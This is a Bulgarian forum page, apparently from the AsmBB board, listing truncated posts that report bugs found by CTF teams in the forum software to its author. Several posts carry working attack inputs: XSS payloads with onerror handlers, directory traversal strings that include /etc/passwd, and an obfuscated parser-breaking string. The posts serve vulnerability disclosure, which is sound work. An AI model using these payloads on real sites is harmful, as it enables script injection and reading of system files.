<bgdev />free

Вход Регистрация
0 1 2
#87511 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

;quote johnfound
;quote sisu
Аз споделих решенията на другите отбори в темата.
;end quote

Пропусна 796f75....
повече...
#87505 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

;quote johnfound
;quote johnfound
Интересно решение с RCE, което няма нужда да се оправя:

[https://twitter.com/wupco1996/status/1635863620868272128][[!https://imgur.com/5tvwYY6.png]]


Интересно...
повече...
#87491 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

;quote johnfound
;quote sisu
Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/[email=%3Cczxc[]]qwe 404
;end quote

Ами че то...
повече...
#87490 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

;quote johnfound
;quote sisu
Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/[email=%3Cczxc[]]qwe 404
;end quote

Ами че то...
повече...
#87489 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

;quote johnfound
;quote sisu
Впрочем, asmbb не беше единствената асембли жертва [https://hxp.io/blog/105/hxp-CTF-2022-browser_insanity-writeup/][https://hxp.io/blog/105/hxp-CTF-2022-browser_insanity-writeup/] 
;end quote

Да-а-а, забелязах....
повече...
#87487 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/[email=%3Cczxc[]]qwe 404
повече...
#87484 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

С това привключваме текущо репортването на бъгове.

Отборите решили задачата:

;begin plain
true_web_assembly released	2023-03-10 21:23...
повече...
#87481 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

bluewater

[email="qwe@qw[email=<img src=f onerror=alert(1) zxc[]]qwe[/img]e.com"]qwe[/email][img][email=<czxc[]]qwe[/img]
повече...
#87480 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

Странен парсинг бъг

Credit: Copy ctf team

;quote hacker [?>:-("><]
?|r-l"AAAAAAAAAAAAAAAAA"=}[{_}+}:_}[/:}^'] /#:~,@DPr::(|r@@{Dlf"?.>r^`~>"^@l&&~<:l:|l:!}@== {-|@""!]l(-=>\o[,.+^r,r<:?$ l.'&/${_[:+^"(<:o:D:;$]|[l{D{~[= /)[&+[}fr<&"[l#'~ *_\...
повече...
#87479 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

Още един бъг но не успях да направя локал репро

1. create thread with title and...
повече...
#87477 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

Относно онзи бъг при чата, където user-ът използва unicode да inject-не unescaped <.

Credit Never Stop...
повече...
#87476 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

Пуснах нова тема, която уж би трябвало да повтори directory travesal от заглавието, таговете, етц на...
повече...
#87475 (ツ)

sisu; Тема: minimag:[include:../../../../../../../../../../etc/passwd],[minimag:[include:../../../../../../../../../../etc/passwd],[include:[include:../../../../../../../../../../etc/passwd]]; 18.03.2023

minimag:[include:../../../../../../../../../../etc/passwd],[minimag:[include:../../../../../../../../../../etc/passwd],[include:[include:../../../../../../../../../../etc/passwd]]
повече...
#87474 (ツ)

sisu; Тема: minimag:[include:../../../../../../../../../../etc/passwd]; 18.03.2023

minimag:[include:../../../../../../../../../../etc/passwd]
повече...
#87473 (ツ)

sisu; Тема: minimag:[include:../../../../../../../../../../etc/passwd]; 18.03.2023

minimag:[include:../../../../../../../../../../etc/passwd]

Нека видим
повече...
#87472 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

В локалния ми сетъп отнема няколко поста за да се появи. Можеш ли да погледнеш?

Отворих...
повече...
#87471 (ツ)

sisu; Тема: weird bug [html:<img src=x onerror="alert(1337)">]; 18.03.2023

[[html:<img src=x onerror="alert(1)">]
повече...
#87470 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

Има някакъв бъг със самото заглавие но не ми е точно ясно какво става.

Тема: [...
повече...
#87466 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

minimag : [ include : ../../../../../../../../../etc/passwd ]

Credit: justCatTheFish ctf team
повече...
#87465 (ツ)

sisu; Тема: johnfound внимание опасност!; 18.03.2023

Имаш(е) directory traversal на няколко места. Случайно да си го оправил? [?:-P] 
повече...
0 1 2
AsmBB v3.0 (check-in: a316dab8b98d07d9); SQLite v3.42.0 (check-in: 831d0fb2836b71c9);
©2016..2023 John Found; Licensed under EUPL. Powered by Assembly language Created with Fresh IDE